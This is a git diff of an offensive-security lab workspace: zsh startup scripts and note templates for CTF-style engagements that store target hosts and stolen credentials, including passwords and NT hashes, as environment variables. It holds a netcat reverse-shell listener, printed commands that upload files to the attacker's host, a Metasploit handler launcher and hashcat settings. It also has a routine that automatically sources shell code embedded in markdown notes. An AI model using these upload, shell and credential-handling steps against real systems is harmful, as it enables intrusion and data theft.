diff --git a/.foam/templates/host.md b/.foam/templates/host.md index 0e64be6..720983d 100644 --- a/.foam/templates/host.md +++ b/.foam/templates/host.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: host +type: host foam_template: filepath: 'hosts/$FOAM_TITLE/$FOAM_TITLE.md' name: 'host' @@ -9,10 +9,18 @@ foam_template: ### ${1:$TM_FILENAME_BASE} -#### host alias +#### host location -- ${1:$TM_FILENAME_BASE} -- ip: +```yaml host +- hostname: ${1:$TM_FILENAME_BASE} + is_dc: false + ip: 10.10.10.10 + alias: ["${1:$TM_FILENAME_BASE}"] # if is DC, please set the dc hostname as the first alias, such as ["dc01.example.com"] +``` + +```zsh env-invoked +set_current_host ${1:$TM_FILENAME_BASE} +``` #### ports diff --git a/.foam/templates/service.md b/.foam/templates/service.md index 3fac94f..2763079 100644 --- a/.foam/templates/service.md +++ b/.foam/templates/service.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: service +type: service foam_template: filepath: 'services/$FOAM_TITLE/$FOAM_TITLE.md' name: 'service' @@ -15,6 +15,10 @@ foam_template: #### location +```zsh env-invoked +# this will be automaticially invoked in your shell when you use this template +``` + On host yyy port xxx #### information diff --git a/.foam/templates/user.md b/.foam/templates/user.md index 4c1616a..f6afa1b 100644 --- a/.foam/templates/user.md +++ b/.foam/templates/user.md @@ -1,6 +1,6 @@ --- title: ${1:$TM_FILENAME_BASE} -tags: user +type: user foam_template: filepath: 'users/$FOAM_TITLE/$FOAM_TITLE.md' name: 'user' @@ -11,10 +11,15 @@ foam_template: #### validated credentials -```yaml +```yaml credentials - login: ${FOAM_TITLE/^(\S*)@//} user: ${FOAM_TITLE/@(\S*)$//} password: pass + nt_hash: fffffffffffffffffffffffffffffffffff +``` + +```zsh env-invoked +set_current_user ${FOAM_TITLE/@(\S*)$//} ``` #### information diff --git a/.gitignore b/.gitignore index 64b8eba..755e400 100644 --- a/.gitignore +++ b/.gitignore @@ -4,7 +4,8 @@ hosts/ users/ services/ index.md -Makefile .DS_Store .vscode/.command_history -zsh_history \ No newline at end of file +zsh_history +weapon_test +test* \ No newline at end of file diff --git a/.vscode/.zshrc b/.vscode/.zshrc index b047066..364c2cc 100644 --- a/.vscode/.zshrc +++ b/.vscode/.zshrc @@ -1,19 +1,19 @@ # POST executed after the shell is loaded # This file is loaded after .zshrc -# you can define any functions,settings,automation here. +# you can define any functions,settings,automation here. source ${PROJECT_FOLDER}/.vscode/env.zsh if [ "$WEB_DELIVERY_MODE" ]; then if [ -z "$PROJECT_WEB_DELIVERY" ]; then echo "PROJECT_WEB_DELIVERY is not set. Please set it in .vscode/env.zsh" - else + else if [ -d "$PROJECT_WEB_DELIVERY" ]; then echo "FOLDER $PROJECT_WEB_DELIVERY exists." else mkdir -p $PROJECT_WEB_DELIVERY - echo "*" > $PROJECT_WEB_DELIVERY/.gitignore + echo "*" >$PROJECT_WEB_DELIVERY/.gitignore echo "FOLDER $PROJECT_WEB_DELIVERY created." fi fi @@ -45,32 +45,33 @@ if [ "$WEB_DELIVERY_MODE" ]; then echo "curl http://$LHOST:$LISTEN_ON/uploadfile --upload-file filename" echo "curl http://$LHOST:$LISTEN_ON/uploadfile -T filename" echo "wget --output-document - --method=PUT http://$LHOST:$LISTEN_ON/uploadfile --body-file=filename" - echo "invoke-webrequest -Uri http://$LHOST:$LISTEN_ON/uploadfile -Method PUT -InFile filename" + echo "invoke-webrequest -Uri http://$LHOST:$LISTEN_ON/uploadfile -Method PUT -InFile filename" echo "==============================================================================================" echo "PS: If your terminal can't display this notes properly, you need resize your terminal window." echo "" # ProjectDiscovery/SimpleHTTPServer simplehttpserver -listen 0.0.0.0:$LISTEN_ON -verbose -upload # python3 -m http.server $LISTEN_ON + read exit 0 -fi - +fi export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg RHOSTS $RHOST;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg LHOST $LHOST;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg LPORT $LPORT;" export METASPLOIT_INIT_COMMAND="${METASPLOIT_INIT_COMMAND} setg VHOST $DOMAIN;" - if [ "$METASPLOIT_HANDLER_MODE" ]; then msfconsole -r "$PROJECT_FOLDER/.vscode/metasploit_handler.rc" \ -x "${METASPLOIT_INIT_COMMAND}" + read exit 0 fi -if [ "$METASPLOIT_CONSOLE_MODE" ]; then +if [ "$METASPLOIT_CONSOLE_MODE" ]; then msfconsole -r "$PROJECT_FOLDER/.vscode/msfconsole.rc" \ -x "${METASPLOIT_INIT_COMMAND}" + read exit 0 fi @@ -83,13 +84,14 @@ if [ "$REVERSE_SHELL_MODE" ]; then echo "Advanced: " echo " https://rev.eson.ninja/?ip=${LHOST}&port=${LPORT}" echo "" - rlwrap -I -cAr nc -lvvp ${LPORT} + rlwrap -I -cAr netcat -lvvp ${LPORT} + read; exit 0 fi # Start the virtual environment if exists if [ -d "$PROJECT_FOLDER/venv" ]; then - if [ -n "${VIRTUAL_ENV}" ];then + if [ -n "${VIRTUAL_ENV}" ]; then # sliently deactivate the virtual environment # echo "Virtual Environment is already activated." @@ -97,80 +99,35 @@ if [ -d "$PROJECT_FOLDER/venv" ]; then # echo "Trying to deactivate the virtual environment automatically." # force deactivate the virtual environment - if [ -n "${_OLD_VIRTUAL_PATH:-}" ] - then - PATH="${_OLD_VIRTUAL_PATH:-}" - export PATH - unset _OLD_VIRTUAL_PATH + if [ -n "${_OLD_VIRTUAL_PATH:-}" ]; then + PATH="${_OLD_VIRTUAL_PATH:-}" + export PATH + unset _OLD_VIRTUAL_PATH fi - if [ -n "${_OLD_VIRTUAL_PYTHONHOME:-}" ] - then - PYTHONHOME="${_OLD_VIRTUAL_PYTHONHOME:-}" - export PYTHONHOME - unset _OLD_VIRTUAL_PYTHONHOME + if [ -n "${_OLD_VIRTUAL_PYTHONHOME:-}" ]; then + PYTHONHOME="${_OLD_VIRTUAL_PYTHONHOME:-}" + export PYTHONHOME + unset _OLD_VIRTUAL_PYTHONHOME fi - if [ -n "${BASH:-}" -o -n "${ZSH_VERSION:-}" ] - then - hash -r 2> /dev/null + if [ -n "${BASH:-}" -o -n "${ZSH_VERSION:-}" ]; then + hash -r 2>/dev/null fi - if [ -n "${_OLD_VIRTUAL_PS1:-}" ] - then - PS1="${_OLD_VIRTUAL_PS1:-}" - export PS1 - unset _OLD_VIRTUAL_PS1 + if [ -n "${_OLD_VIRTUAL_PS1:-}" ]; then + PS1="${_OLD_VIRTUAL_PS1:-}" + export PS1 + unset _OLD_VIRTUAL_PS1 fi unset VIRTUAL_ENV unset VIRTUAL_ENV_PROMPT - if [ ! "${1:-}" = "nondestructive" ] - then + if [ ! "${1:-}" = "nondestructive" ]; then # deactivate always useless here # unset -f deactivate fi fi - + source $PROJECT_FOLDER/venv/bin/activate fi -# Auto Create Project Note Structure. -function create_project_structure () { - if [ -f "${PROJECT_FOLDER}/Makefile" ];then # lock the project folder - return - fi - mkdir -p $PROJECT_FOLDER/{hosts,users,services} - touch $PROJECT_FOLDER/entrypoint.md - touch $PROJECT_FOLDER/Makefile - - echo "Project Folder sturcture created completed!" - echo "===================== MANUAL =====================" - echo "Note: this function will not run again if Makefile is exists!" - echo "if you don't need created folder structure" - echo "Clean Project Folder: " - echo " clean_project_structure" - echo "" - echo "Create Notes:" - echo " User: " - echo " new-user " - echo " Host:" - echo " new-host " - echo " Service: " - echo " new-service " - echo "Delete Notes:" - echo " User: " - echo " del-user " - echo " Host:" - echo " del-host " - echo " Service: " - echo " del-service " - echo "==================================================" -} -create_project_structure -unset -f create_project_structure - -function clean_project_structure () { - rm -rf $PROJECT_FOLDER/{hosts,users,services} $PROJECT_FOLDER/entrypoint.md # $PROJECT_FOLDER/Makefile - echo "Project Folder sturcture cleaned completed!" -} - # change hist file location in project. HISTSIZE=100000000 SAVEHIST=100000000 @@ -184,13 +141,13 @@ setopt inc_append_history setopt share_history setopt hist_save_no_dups setopt histignorealldups -setopt EXTENDED_HISTORY # with timestamp -fc -R -I ${OLD_HISTFILE} # loading the old histfile +setopt EXTENDED_HISTORY # with timestamp +fc -R -I ${OLD_HISTFILE} # loading the old histfile -if [[ "$HIST_COMMAND_INDEXER" != "" ]]; then +if [[ "$HIST_COMMAND_INDEXER" != "" ]]; then if [[ ! -f ${HIST_COMMAND_INDEXER} ]]; then echo "HIST_COMMAND_INDEXER file not found: ${HIST_COMMAND_INDEXER}" - else + else fc -R -I ${HIST_COMMAND_INDEXER} # loading the command indexer fi -fi +fi diff --git a/.vscode/env.zsh b/.vscode/env.zsh index 3181ed3..d5ff082 100644 --- a/.vscode/env.zsh +++ b/.vscode/env.zsh @@ -2,106 +2,215 @@ ################################################################ # Project settings for Zsh Prompt # export HOST="[HackTheBox - Machine Name]" +unset USER_ZDOTDIR ################################################################ -# Target settings -export RHOST=10.10.X.X -# works well on HTB and THM, Put your reverse IP here. - +# Self condition settings # use this if you are using a VPS or cloud server it can automatically get your public IP. -# export LHOST=`curl ifconfig.me` +# export LHOST=`curl ifconfig.me` # export LHOST=`curl ip.me` -export LHOST=`ifconfig|grep '10\.10\.'|cut -d ' ' -f2` +if command -v ifconfig >/dev/null 2>&1; then + export LHOST=${$(ifconfig | grep '10\.10\.' | cut -d ' ' -f2):-10.0.0.1} +else + export LHOST=${$(ip a | grep '10\.10\.' | cut -d ' ' -f6 | cut -d '/' -f1):-10.0.0.1} +fi export ATTACKER_IP=$LHOST export LPORT=6789 -export DOMAIN= -export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip +################################################################ +# Target settings +# export RHOST=10.10.X.X +# works well on HTB and THM, Put your reverse IP here. +# export DOMAIN= -export IP=${RHOST} # alias rhost -export ip=${IP} # alias as IP -export DC_IP=${RHOST} # alias rhost -export DC_HOST=dc01.${DOMAIN} # domain controller host, if not set use dc01.domain.com +# export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip -export USER_A=username -export PASS_A=password -export NT_HASH_A=ffffffffffffffffffffffffffffffff # NTLM hash, if you have it +# export IP=${RHOST} # alias rhost +# export ip=${IP} # alias as IP +# export DC_IP=${RHOST} # alias rhost +# export DC_HOST=dc01.${DOMAIN} # domain controller host, if not set use dc01.domain.com -export USER_B= -export PASS_B= +function cut_lines_from_markdown_codes() { + local file_path=$1 + if [[ ! -f $file_path ]]; then + echo "no such file!" + return 1 + fi + local identity='```'$2 + local line=$(grep -n -E '^```' "$file_path" | grep "$identity" -A1 | cut -d : -f1) + local line_no_list=$(echo "$line" | awk 'NR%2==1{T=$0;next}{print T "|" $0}') + for line_no in $(echo $line_no_list); do + local line_no_start=$(echo $line_no | cut -d "|" -f 1) + local line_no_end=$(echo $line_no | cut -d "|" -f 2) + local line_start=$(($line_no_start + 1)) + if [[ "$line_no_end" == "$line_start" ]]; then # if the next line is the same as the start line, then it is empty + echo "" + return + fi + local line_end=$(($line_no_end - 1)) + if [[ "$line_start" == "1" && "$line_end" == "-1" ]]; then + return 1 + fi + sed -n "${line_start},${line_end}p" "$file_path" + done +} -export CURRENT=A # set the current username -export CURRENT_USER=`eval echo '$USER_'$CURRENT` # alias for USER_A -export CURRENT_PASS=`eval echo '$PASS_'$CURRENT` # alias for PASS_A -export CURRENT_NT_HASH=`eval echo '$NT_HASH_'$CURRENT` # alias for NT_HASH_A +function safe_name() { + local name=$1 + if [[ -z $name ]]; then + echo "Usage: safe_name " + return 1 + fi + echo "$name" | tr '@$.- [](){}!#' '_' # replace . and - with _ to avoid env var issues +} -# defined variables if u need -export USER=${CURRENT_USER} -export USERNAME=${CURRENT_USER} -export PASS=${CURRENT_PASS} -export PASSWORD=${CURRENT_PASS} # alias for PASS -export NT_HASH=${CURRENT_NT_HASH} # alias for NT_HASH_A +function update_host_to_env() { + if [[ -x "$(command -v yq)" && -d "${PROJECT_FOLDER}/hosts" ]]; then + for ur in ${(@f)"$(ls -1 ${PROJECT_FOLDER}/hosts)"}; do + local file="${PROJECT_FOLDER}/hosts/${ur}/${ur}.md" + if [ -f "$file" ]; then + local host_data=$(cut_lines_from_markdown_codes "$file" "yaml host") + + local hostname=$(echo "$host_data" | yq '.[0].hostname' -r) + local _var=$(safe_name "$hostname" ) # replace . and - with _ to avoid env var issues + + local ip=$(echo "$host_data" | yq '.[0].ip' -r) + local is_dc=$(echo "$host_data" | yq '.[0].is_dc' -r) + if [[ "$is_dc" == "true" ]]; then + export DC_HOST_${_var}=$(echo "$host_data" | yq '.[0].alias.[0]') + export DC_HOST=$(echo "$host_data" | yq '.[0].alias.[0]') # default dc01.domain.com + export DC_IP_${_var}=$ip + export DC_IP=${ip} + export IS_DC_${_var}="true" + fi + local count=1 + for alias in $(echo "$host_data"|yq '.[0].alias.[]' -r ); do + export HOST_ALIAS_${_var}_${count}=$alias # replace . and - with _ to avoid env var issues + count=$((count + 1)) + done + export HOST_${_var}=$hostname + export IP_${_var}=$ip + fi + done + fi +} +update_host_to_env + +function set_current_host() { + if [[ -z $1 ]]; then + echo "current host is set to ${CURRENT_HOST}" + echo "Usage: set_current_host " + echo "Example: set_current_host dc01" + echo "supported hosts: " + echo "" + env | egrep '^HOST_' | sed -e 's/HOST_//g' | awk '{printf "- " $1 "\n"}' | sed -e 's/=/: /g' | sort + return 1 + fi + export CURRENT_HOST=$(safe_name "$1") # replace . and - with _ to avoid env var issues + export CURRENT_IP=$(eval echo '$IP_'$CURRENT_HOST) # alias for IP_dc01 or IP_dc02 + export CURRENT_HOSTNAME=$(eval echo '$HOST_'$CURRENT_HOST) # alias for HOST_dc01 or HOST_dc02 + + # defined variables if u need + export RHOST=${CURRENT_IP} + export IP=${CURRENT_IP} + export DOMAIN=${CURRENT_HOSTNAME} # alias for DOMAIN_dc01 or DOMAIN_dc02 + export TARGET=${DOMAIN:-${RHOST}} # target is target hostname if not set use RHOST ip + if [[ "$(eval echo '$IS_DC_'$CURRENT_HOST)" == "true" ]]; then + export DC_IP=$(eval echo '$DC_IP_'$CURRENT_HOST) # alias for DC_IP_dc01 or DC_IP_dc02 + export DC_HOST=$(eval echo '$DC_HOST_'$CURRENT_HOST) # alias for DC_HOST_dc01 or DC_HOST_dc02 + fi +} +# set_current_host xx.htb + +# auto set the data in the +function update_user_cred_to_env() { + if [[ -x "$(command -v yq)" && -d "${PROJECT_FOLDER}/users" ]]; then + for ur in ${(@f)"$(ls -1 ${PROJECT_FOLDER}/users)"}; do + local file="${PROJECT_FOLDER}/users/${ur}/${ur}.md" + if [ -f "$file" ]; then + local usercred=$(cut_lines_from_markdown_codes "$file" "yaml credentials") + + local user=$(echo "$usercred" | yq '.[0].user' -r) + local _var=$(safe_name "$user") # replace . and - with _ to avoid env var issues + local pass=$(echo "$usercred" | yq '.[0].password' -r) + local nt_hash=$(echo "$usercred" | yq '.[0].nt_hash' -r) + local login=$(echo "$usercred" | yq '.[0].login' -r) + export LOGIN_${_var}=$login + export USER_${_var}=$user + export PASS_${_var}=$pass + export NT_HASH_${_var}=$nt_hash + fi + done + fi +} +update_user_cred_to_env + +function set_current_user() { + if [[ -z $1 ]]; then + echo "current user is set to ${CURRENT}" + echo "Usage: set_current_user " + echo "Example: set_current_user A" + echo "supported users: " + echo "" + env | egrep '^USER_' | sed -e 's/USER_//g' | awk '{printf "- " $1 "\n"}' | sed -e 's/=/: /g' | sort + return 1 + fi + export CURRENT=$(safe_name "$1" ) # replace . and - with _ to avoid env var issues + export CURRENT_USER=$(eval echo '$USER_'$CURRENT) # alias for USER_A or USER_B + export CURRENT_PASS=$(eval echo '$PASS_'$CURRENT) # alias for PASS_A or PASS_B + export CURRENT_NT_HASH=$(eval echo '$NT_HASH_'$CURRENT) # alias for NT_HASH_A or NT_HASH_B + export CURRENT_LOGIN=$(eval echo '$LOGIN_'$CURRENT) # alias for LOGIN_A or LOGIN_B + + # defined variables if u need + export USER=${CURRENT_USER} + export USERNAME=${CURRENT_USER} + export PASS=${CURRENT_PASS} + export PASSWORD=${CURRENT_PASS} # alias for PASS + export NT_HASH=${CURRENT_NT_HASH} # alias for NT_HASH_A + export LOGIN=${CURRENT_LOGIN} # alias for LOGIN_A +} +# set_current_user + +### auto invoke the commands in markdown files +function auto_invoker() { + for markdown in ${(@f)"$(find ${PROJECT_FOLDER}/{users,hosts,services} -iname "*.md" 2>/dev/null)"}; do # list all markdown files in users, hosts, services + local auto_invoker=$(cut_lines_from_markdown_codes "$markdown" "zsh env-invoked") + if [[ -n "$auto_invoker" ]]; then + source <(echo "$auto_invoker") # source it! + fi + done +} +auto_invoker + +function current_status() { + if [[ -z $CURRENT_RHOST ]]; then + echo "No current host set." + else + echo "Current Host: ${TARGET} => ${DOMAIN} (${RHOST}) ${DC_HOST} ${DC_IP}" + fi + if [[ -z $CURRENT_USER ]]; then + echo "No current user set." + else + echo "Current User: ${USER} => ${USER}:${PASS} (${NT_HASH})" + fi +} +if [[ ! -z "$SHOW_CURRENT_STATUS" ]]; then + current_status +fi # export KRB5CCNAME= -# FAKETIME settings # export LD_PRELOAD=/usr/local/lib/libfaketime.so.1 # export LD_PRELOAD=/usr/lib/aarch64-linux-gnu/faketime/libfaketime.so.1 # export DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=/opt/homebrew/Cellar/libfaketime/0.9.10/lib/faketime/libfaketime.1.dylib # export FAKETIME="-8h" - export METASPLOIT_INIT_COMMAND="" -################################################################ -# Advanced settings - -# AWS settings -# export AWS_DEFAULT_REGION=us-west-2 -# export AWS_ACCESS_KEY_ID=AKIA... -# export AWS_SECRET_ACCESS_KEY=... -# export AWS_SESSION_TOKEN=... -# export AWS_ENDPOINT_URL= - -# VAULT settings -# export VAULT_ADDR= -# export VAULT_TOKEN=... - -# MINIO settings -# export MINIO_ROOT_USER=... # access key -# export MINIO_ROOT_PASSWORD=... # secret key -# export MINIO_ENDPOINT= -# export MC_HOST_myminio=http://${MINIO_ROOT_USER}:${MINIO_ROOT_PASSWORD}@${MINIO_ENDPOINT} - -# Kubernetes settings -# export KUBECONFIG=${PROJECT_FOLDER}/kubeconfig - -# Terraform settings -export TF_LOG=trace -export TF_LOG_PATH=$PROJECT_FOLDER/terraform.log -# export TF_VAR_aws_access_key=... -# export TF_VAR_aws_secret_key=... -# export TF_VAR_aws_session_token=... -# export TF_VAR_aws_region=us-west-2 - -# OpenStack settings -# export OS_USERNAME=username -# export OS_PASSWORD=password -# export OS_TENANT_NAME=projectName -# export OS_AUTH_URL=https://identityHost:portNumber/v2 -# The following lines can be omitted -# export OS_TENANT_ID=tenantIDString -# export OS_REGION_NAME=regionName -# export OS_CACERT=/path/to/cacertFile -# export OS_TOKEN=tokenString - -################################################################ -# More default settings - export PROJECT_WEB_DELIVERY=$PROJECT_FOLDER/.web-delivery # web-delivery is a folder in PROJECT_FOLDER -unset SSS_LOADED # make sure sss init shell is not set +unset SSS_LOADED # make sure sss init shell is not set ################################################################ # Network settings clean up and reset @@ -114,10 +223,10 @@ unset https_proxy http_proxy all_proxy # Hashcat settings # useful settings like ROCKYOU, SECLIST, etc. -# export ROCKYOU=/usr/share/wordlists/rockyou.txt -# export SECLIST=/usr/share/wordlists/seclists/ -# export TOP_DNS=${SECLIST}/Discovery/DNS/bitquark-subdomains-top100000.txt -# export WORDLISTS=/usr/share/wordlists/ +export WORDLIST=${WORDLIST:-/usr/share/wordlists} +export ROCKYOU=${WORDLIST}/rockyou.txt +export SECLIST=${WORDLIST}/seclists/ +export TOP_DNS=${SECLIST}/Discovery/DNS/bitquark-subdomains-top100000.txt export HASHCAT_MODE_WORDLIST=0 export HASHCAT_MODE_COMBINATION=1 @@ -153,131 +262,219 @@ export HASH_KRB5_TGS_18=19700 export HASH_JWT=16500 export HASH_KRB5_AS_REP_23=18200 - # utils functions ### functions function proxys() { - export Proxy="127.0.0.1" # define as your favour - export ProxyPort="7890" # define as your favour + export Proxy="127.0.0.1" # define as your favour + export ProxyPort="7890" # define as your favour case "$1" in - (h) - echo "|==============================================|" - echo "| $0 Usage |" - echo "| ---- fast commandline proxy switcher |" - echo "|==============================================|" - echo "| Basic Usage: $0 [SubCommand] [param1] |" - echo "|==============================================|" - echo "| Sub Command List |" - echo "|==============================================|" - echo "| proxy [proxy_ip] import ip temply |" - echo "| port [port_id] import port temply |" - echo "| loc import localhost |" - echo "| on up the cli proxy |" - echo "| off down the proxy |" - echo "| * show proxy setting |" - echo "| h/help show help |" - echo "|==============================================|" - ;; - (proxy) - export Proxy="$2" - ;; - (port) - export ProxyPort="$2" - ;; - (loc) - export Proxy="127.0.0.1" # define as your favour - export ProxyPort="7890" # define as your favour - $0 on - ;; - (on) - export https_proxy=http://$Proxy:$ProxyPort \ - http_proxy=http://$Proxy:$ProxyPort && \ + h) + echo "|==============================================|" + echo "| proxys Usage |" + echo "| ---- fast commandline proxy switcher |" + echo "|==============================================|" + echo "| Basic Usage: proxys [SubCommand] [param1] |" + echo "|==============================================|" + echo "| Sub Command List |" + echo "|==============================================|" + echo "| proxy [proxy_ip] import ip temply |" + echo "| port [port_id] import port temply |" + echo "| loc import localhost |" + echo "| set [protocol]://[proxy_ip]:[port] set proxy |" + echo "| on up the cli proxy |" + echo "| off down the proxy |" + echo "| * show proxy setting |" + echo "| h/help show help |" + echo "|==============================================|" + ;; + set) + if [ -z "$2" ]; then + echo "Usage: $0 set [protocol]://[proxy_ip]:[port]" + echo "Example: $0 set http://127.0.0.1:8080" + else + export http_proxy="$2" \ + https_proxy="$2" \ + all_proxy="$2" && + echo "export Proxy complete" && $0 show + fi + ;; + proxy) + export Proxy="$2" + ;; + port) + export ProxyPort="$2" + ;; + loc) + export Proxy="127.0.0.1" # define as your favour + export ProxyPort="7890" # define as your favour + $0 on + ;; + on) + export https_proxy=http://$Proxy:$ProxyPort \ + http_proxy=http://$Proxy:$ProxyPort && echo 'export Proxy complete' && $0 show - ;; - (off) - unset https_proxy http_proxy all_proxy && echo 'unset Proxy complete' - ;; - (help) - proxys h - ;; - (*) - echo "Current Proxy Condition like ...." - export|grep proxy - echo "if you can't see any output like 'XX_PROXY=' there" - echo "That means no proxy is set" - ;; + ;; + off) + unset https_proxy http_proxy all_proxy && echo 'unset Proxy complete' + ;; + help) + proxys h + ;; + *) + echo "Current Proxy Condition like ...." + export | grep proxy + echo "if you can't see any output like 'XX_PROXY=' there" + echo "That means no proxy is set" + ;; esac } -function venv-init () { - python3 -m venv venv +function venv-init() { + python3 -m venv venv } -function venv-activate () { - if [ -d "./venv/" ] - then +function venv-activate() { + if [ -d "./venv/" ]; then source "./venv/bin/activate" - else + else echo "No Python venv there. Error" fi } -function goproxy () { +function goproxy() { case "$1" in - (on) export GOPROXY=https://goproxy.io,direct ;; - (off) unset GOPROXY ;; - (*) $0 on/off ;; + on) export GOPROXY=https://goproxy.io,direct ;; + off) unset GOPROXY ;; + *) $0 on/off ;; esac } -function url () { +function url() { case "$1" in - (h |-h |help| --help) - which $0 - ;; - (decode | d | -d | --decode) if [ -z "$2" ] - then - \python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()));" - else - \python3 -c "import sys; from urllib.parse import unquote; print(unquote(' '.join(sys.argv[2:])));" "$@" - fi ;; - (encode | e | -e | --encode) if [ -z "$2" ] - then - \python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read()[:-1]));" - else - \python3 -c "import sys; from urllib.parse import quote; print(quote(' '.join(sys.argv[2:])));" "$@" - fi ;; + h | -h | help | --help) + which $0 + ;; + decode | d | -d | --decode) if [ -z "$2" ]; then + \python3 -c "import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()));" + else + \python3 -c "import sys; from urllib.parse import unquote; print(unquote(' '.join(sys.argv[2:])));" "$@" + fi ;; + encode | e | -e | --encode) if [ -z "$2" ]; then + \python3 -c "import sys; from urllib.parse import quote; print(quote(sys.stdin.read()[:-1]));" + else + \python3 -c "import sys; from urllib.parse import quote; print(quote(' '.join(sys.argv[2:])));" "$@" + fi ;; esac } # Here is mode if-tree complete, Now will launch the shell # export SUBDOMAIN_WORDLIST=$SECLIST/Discovery/DNS/bitquark-subdomains-top100000.txt # pipx install wfuzz -# alias wfuzz=docker run --rm --name wfuzz -v /usr/share/wordlists:/wordlists/ -it ghcr.io/xmendez/wfuzz wfuzz +# alias wfuzz=docker run --rm --name wfuzz -v /usr/share/wordlists:/wordlists/ -it ghcr.io/xmendez/wfuzz wfuzz # usage: alias wfuzz_http_vhost='wfuzz -c -w $SUBDOMAIN_WORDLIST -H "Host: FUZZ.$host" -u "http://$host"' # usage: alias wfuzz_https_vhost='wfuzz -c -w $SUBDOMAIN_WORDLIST -H "Host: FUZZ.$host" -u "https://$host"' alias wfuzz=\wfuzz -# unset -f wfuzz_vhost_http -function wfuzz_vhost_http () { - local host=$1 - local wordlist=$2 - if [[ -z $wordlist ]] || [[ -z $host ]] - then - echo "Usage: wfuzz_vhost [wfuzz options]" - return - fi - wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "http://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +# unset -f wfuzz_vhost_http +function wfuzz_vhost_http() { + local host=$1 + local wordlist=$2 + if [[ -z $wordlist ]] || [[ -z $host ]]; then + echo "Usage: wfuzz_vhost [wfuzz options]" + return + fi + wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "http://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 } # unset -f wfuzz_vhost_https -function wfuzz_vhost_https () { - local host=$1 - local wordlist=$2 - if [[ -z $wordlist ]] || [[ -z $host ]] - then - echo "Usage: wfuzz_vhost [wfuzz options]" - return - fi - wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "https://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +function wfuzz_vhost_https() { + local host=$1 + local wordlist=$2 + if [[ -z $wordlist ]] || [[ -z $host ]]; then + echo "Usage: wfuzz_vhost [wfuzz options]" + return + fi + wfuzz -c -w $wordlist -H "Host: FUZZ.$host" -u "https://$host" $3 $4 $5 $6 $7 $8 $9 $10 $11 $12 $13 $14 $15 $16 $17 $18 $19 +} + +function ntlm() { + if [ -n "$1" ]; then + python3 -c 'import hashlib,binascii;hash = hashlib.new("md4", "'$1'".encode("utf-16le")).digest();print(binascii.hexlify(hash).decode("utf-8"))' + if [[ $? -ne 0 ]]; then + echo "Error: ntlm hash generation failed. " + echo "if not support md4 hash, please check your openssl config." + return 1 + fi + else + echo "usage: $0 password" + fi +} + +function dump_hosts() { + for host in $(env|grep -E '^HOST_'|grep -v 'HOST_ALIAS'); do + local _var=$(echo $host|sed -e 's/HOST_//g' | cut -d '=' -f1) # replace _ with - to get the original hostname + local _ip=$(eval echo '$IP_'$_var) + local _hostname=$(eval echo '$HOST_'$_var) + local aliases=$(env | grep -E "^HOST_ALIAS_${_var}_" |cut -d '=' -f2 | tr '\n' ' ') + echo "${_ip} ${_hostname} ${aliases}" + done +} + +function dump_users() { + echo "dumping impacket format for users:" + for user in $(env|grep -E '^USER_'|grep -v 'USER_ALIAS'); do + local _var=$(echo $user|sed -e 's/USER_//g' | cut -d '=' -f1) # replace _ with - to get the original username + local _user=$(eval echo '$USER_'$_var) + local _pass=$(eval echo '$PASS_'$_var) + local _nt_hash=$(eval echo '$NT_HASH_'$_var) + local _login=$(eval echo '$LOGIN_'$_var) + if [[ "$_login" == "$_user" ]]; then + _login=$DOMAIN + fi + if [[ "$_nt_hash" == "fffffffffffffffffffffffffffffffffff" ]]; then + echo "\"${_login}\"/\"${_user}\":'${_pass}' (No NT Hash)" + else + echo "\"${_login}\"/\"${_user}\" (${_nt_hash})" + fi + done + echo "" + echo "# dumping environment variables for users:" + for user in $(env|grep -E '^USER_'|grep -v 'USER_ALIAS'); do + local _var=$(echo $user|sed -e 's/USER_//g' | cut -d '=' -f1) + local _user=$(eval echo '$USER_'$_var) + echo "# user: $_user" + local _pass=$(eval echo '$PASS_'$_var) + local _nt_hash=$(eval echo '$NT_HASH_'$_var) + local _login=$(eval echo '$LOGIN_'$_var) + echo "export USER_${_var}=\"${_user}\"" + echo "export PASS_${_var}=\"${_pass}\"" + echo "export NT_HASH_${_var}=\"${_nt_hash}\"" + echo "export LOGIN_${_var}=\"${_login}\"" + done + echo "" + echo "# dumping current user environment variables:" + echo "export USER=${CURRENT_USER}" + echo "export USERNAME=${CURRENT_PASS}" + echo "export PASS=${CURRENT_PASS}" + echo "export PASSWORD=${CURRENT_PASS}" + echo "export NT_HASH=${CURRENT_NT_HASH}" + echo "export LOGIN=${CURRENT_LOGIN}" + echo "" + echo "export CURRENT_USER=${CURRENT_USER}" + echo "export CURRENT_PASS=${CURRENT_PASS}" + echo "export CURRENT_NT_HASH=${CURRENT_NT_HASH}" + echo "export CURRENT_LOGIN=${CURRENT_LOGIN}" + echo "export CURRENT=${CURRENT}" +} + +function differ() { + if [[ -z $1 || -z $2 ]]; then + echo "Usage: differ " + return 1 + fi + if [[ ! -f $1 || ! -f $2 ]]; then + echo "File not found!" + return 1 + fi + code -d "$1" "$2" } diff --git a/.vscode/extensions.json b/.vscode/extensions.json index 8c2bad2..5262c5b 100644 --- a/.vscode/extensions.json +++ b/.vscode/extensions.json @@ -6,14 +6,12 @@ // remote controls "ms-vscode-remote.remote-ssh", // remote ssh controller "ms-kubernetes-tools.vscode-kubernetes-tools", // Kubernetes Control - // documents and file read helper "foam.foam-vscode", // double linked knowledge base for showing the relationship in targets in actions "redhat.vscode-xml", // xml formatter "redhat.vscode-yaml", // yaml formatter 